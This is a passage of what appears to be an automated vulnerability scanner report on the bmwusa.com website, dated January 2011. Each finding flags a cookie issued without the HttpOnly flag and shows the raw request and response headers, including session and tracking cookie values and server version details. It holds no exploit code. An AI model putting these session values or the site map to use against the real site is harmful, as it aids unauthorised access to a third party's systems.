Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:04:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:24:04 GMT;path=/
Content-Length: 215296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.418. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:24:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:04:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:24:20 GMT;path=/
Content-Length: 202210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.419. http://www.bmwusa.com/standard/content/vehicles/2011/z4/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:25:57 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:05:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:25:57 GMT;path=/
Content-Length: 240756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.420. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4explore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4explore.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:26:40 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4explore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:06:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:26:40 GMT;path=/
Content-Length: 180450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.421. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:14 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:07:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:14 GMT;path=/
Content-Length: 213969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.422. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/features_and_specs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive30i/features_and_specs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:14 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive30i/features_and_specs.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Standard/Content/Vehicles/2011/Z4/Z4sDrive30i/features_and_specs/default.aspx?from=/standard/content/vehicles/2011/z4/z4sdrive30i/features_and_specs.aspx&return=/standard/content/vehicles/2011/z4/z4sdrive30i/features_and_specs.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 401
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 22:08:14 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:14 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fStandard%2fContent%2fVehicles%2f2011%2fZ4%2fZ4sDrive30i%2ffeatures_and_specs%2fdefault.aspx%3ffrom%3d%2fstandard%2
...[SNIP]...

10.423. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:38 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:07:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:38 GMT;path=/
Content-Length: 215060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.424. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:57 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:07:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:57 GMT;path=/
Content-Length: 202214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.425. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:19 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:08:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:19 GMT;path=/
Content-Length: 213976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.426. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/features_and_specs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive35i/features_and_specs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:29:06 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive35i/features_and_specs.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Standard/Content/Vehicles/2011/Z4/Z4sDrive35i/features_and_specs/default.aspx?from=/standard/content/vehicles/2011/z4/z4sdrive35i/features_and_specs.aspx&return=/standard/content/vehicles/2011/z4/z4sdrive35i/features_and_specs.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 401
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 22:09:06 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:29:06 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fStandard%2fContent%2fVehicles%2f2011%2fZ4%2fZ4sDrive35i%2ffeatures_and_specs%2fdefault.aspx%3ffrom%3d%2fstandard%2
...[SNIP]...

10.427. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:54 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:08:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:54 GMT;path=/
Content-Length: 215086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.428. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:55 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:08:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:55 GMT;path=/
Content-Length: 202217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.429. https://www.bmwusa.com/ScriptResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:45 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.430. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:11:48 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.431. https://www.bmwusa.com/Secured/FrameCheck.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/FrameCheck.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:38 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.432. https://www.bmwusa.com/Secured/NaN previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/NaN

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; path=/
NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:38 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.433. https://www.bmwusa.com/WebResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:46 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.434. https://www.bmwusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:31:09 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.435. https://www.bmwusa.com/jsenvconst.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
